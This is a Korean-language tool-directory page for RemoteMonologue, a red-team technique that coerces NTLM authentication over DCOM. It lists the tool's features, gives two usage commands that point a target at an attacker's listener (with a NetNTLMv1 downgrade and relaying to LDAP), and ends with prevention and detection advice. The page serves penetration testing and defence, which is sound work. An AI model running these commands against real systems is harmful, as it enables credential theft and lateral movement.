Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
RemoteMonologue — NTLM 인증 강제를 위한 DCOM 무기화 | Kitploit
도구/GitHubGitHub/xforcered/remotemonologue
Password AttacksExploitationLateral MovementInformation GatheringPenetration TestingRed Teaming
GitHubxforcered/remotemonologue

RemoteMonologue

NTLM 인증 강제를 위한 DCOM 무기화

저장소 보기
275221년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

RemoteMonologue

RemoteMonologue는 대화형 사용자 RunAs 키를 활용하고 DCOM을 통해 NTLM 인증을 강제하여 원격 사용자를 손상시키는 Windows 자격 증명 수집 기법입니다.

자세한 내용은 X-Force Red의 RemoteMonologue: Weaponizing DCOM for NTLM Authentication Coercions 문서를 참조하세요.

기능

🔹 DCOM을 통한 인증 강제 (-dcom)

  • 네 가지 DCOM 개체(ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession)를 대상으로 지정된 리스너(-auth-to)에 대한 NTLM 인증을 트리거합니다.

🔹 자격 증명 스프레이 (-spray)

  • 사용자 자격 증명을 캡처하면서 여러 시스템에 걸쳐 자격 증명을 검증합니다.

🔹 NetNTLMv1 다운그레이드 공격 (-downgrade)

  • 대상이 NTLMv1을 사용하도록 강제하여 자격 증명 크래킹과 릴레이를 더 쉽게 만듭니다.

🔹 WebClient 서비스 남용 (-webclient)

  • WebClient 서비스를 활성화하여 HTTP 기반 인증 강제를 용이하게 합니다.

🔹 사용자 열거 (-query)

  • 대상 시스템에서 활성 세션이 있는 사용자를 식별합니다.

참고: 대상 시스템에 대한 로컬 관리자 권한이 필요합니다.

설정

root@kitploit:~
pip install impacket

예시

다음은 Responder를 리스너로 사용하면서 NetNTLMv1 다운그레이드 공격을 수행하는 RemoteMonologue 실행 예시입니다. 기본적으로 DCOM 옵션이 지정되지 않으면 도구는 ServerDataCollectorSet DCOM 개체를 사용합니다.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

image

다음은 또 다른 예시로, FileSystemImage DCOM 개체를 사용하고 WebClient 서비스를 활성화하여 HTTP 인증을 얻은 다음 ntlmrelayx를 사용해 LDAP로 릴레이하는 공격입니다.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

image

방어 고려 사항

이러한 기법으로부터 보호하고 탐지하기 위해 구현할 수 있는 몇 가지 예방 및 탐지 조치가 있습니다.

예방 조치:

  1. LDAP 서명 및 채널 바인딩 활성화: 도메인 컨트롤러에서 LDAP 서명 적용 및 채널 바인딩을 구성하여 릴레이 공격으로부터 LDAP 엔드포인트를 보호합니다. 참고: 이러한 설정은 Windows Server 2025부터 기본적으로 적용됩니다.

  2. 최신 Windows 버전으로 업그레이드: 서버는 Windows Server 2025, 워크스테이션은 Windows 11 버전 24H2로 업그레이드하여 NetNTLM 다운그레이드 공격을 완화합니다. 이러한 버전에서는 NTLMv1이 제거되었습니다.

  3. SMB 서명 적용: Windows 서버에서 SMB 서명을 활성화하고 적용하여 SMB 릴레이 공격을 방지합니다.

  4. 강력한 암호 정책 구현: 강력한 암호 요구 사항을 적용하여 암호 크래킹 공격을 더 어렵게 만듭니다.

탐지 기회:

  1. DCOM 개체에 대한 원격 액세스 모니터링: 영향을 받는 DCOM 개체와 해당 특정 속성 및 메서드에 대한 액세스를 추적하여 비정상적인 활동을 식별합니다.

  2. 레지스트리 수정 모니터링: RunAs 및 LmCompatibilityLevel 레지스트리 키의 변경 사항을 모니터링합니다.

  3. WebClient 서비스 활동 추적: WebClient 서비스가 원격으로 활성화되는 사례를 모니터링합니다. 이는 HTTP 기반 NTLM 인증을 용이하게 하는 데 사용됩니다.

도구 다운로드